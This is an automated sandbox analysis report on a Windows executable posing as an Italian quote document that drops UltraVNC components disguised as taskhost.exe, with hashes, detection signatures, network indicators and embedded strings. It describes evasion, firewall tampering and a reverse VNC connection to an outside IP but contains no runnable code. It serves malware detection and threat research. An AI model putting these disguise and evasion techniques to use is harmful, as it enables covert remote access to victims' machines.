Windows Analysis Report
Preventivo24.01.11.exe

Overview

General Information

Sample name: Preventivo24.01.11.exe
Analysis ID: 1379424
MD5: 32f35b78a3dc5949ce3c99f2981def6b
SHA1: 18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256: 0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
Tags: exe
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains VNC / remote desktop functionality (version string found)
Contains functionality to change the wallpaper
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: Preventivo24.01.11.exe Virustotal: Detection: 17%
Source: Preventivo24.01.11.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Preventivo24.01.11.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: C:\Windows\SysWOW64\msiexec.exe File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: e:
Source: C:\Windows\SysWOW64\cmd.exe File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: a:
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle, 0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW, 0_2_00EA5220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose, 0_2_00FBD700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_01008B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_00FBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE3210 FindFirstFileW,FindClose, 0_2_00FE3210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose, 0_2_00F9F570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00FF3790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF3C10 FindFirstFileW,FindClose, 0_2_00FF3C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose, 0_2_00FCBFF0
Source: C:\Games\taskhost.exe Code function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose, 41_2_000BEC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 0_2_00FF2400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\

Networking

Source: Traffic Snort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.5:49705 -> 93.184.216.34:80
Source: global traffic TCP traffic: 192.168.2.4:49749 -> 140.228.29.110:5500
Source: Joe Sandbox View IP Address: 52.202.204.11 52.202.204.11
Source: Joe Sandbox View IP Address: 93.184.216.34 93.184.216.34
Source: global traffic HTTP traffic detected: OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-keyOrigin: https://rna-resource.acrobat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /download/updates.txt HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: www.example.comConnection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: www.example.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 590017Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Tue, 23 Jan 2024 11:17:59 GMTExpires: Tue, 30 Jan 2024 11:17:59 GMTLast-Modified: Tue, 16 Jan 2024 15:24:22 GMTServer: ECS (agb/52BB)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256
Source: shi6E82.tmp.0.dr String found in binary or memory: http://.css
Source: shi6E82.tmp.0.dr String found in binary or memory: http://.jpg
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000003.1699814897.0000000000923000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700478610.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Preventivo24.01.11.exe, 00000000.00000003.1659305606.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?31abf359f1d5f
Source: shi6E82.tmp.0.dr String found in binary or memory: http://html4/loose.dtd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0R
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://s.symcd.com06
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://t2.symcb.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
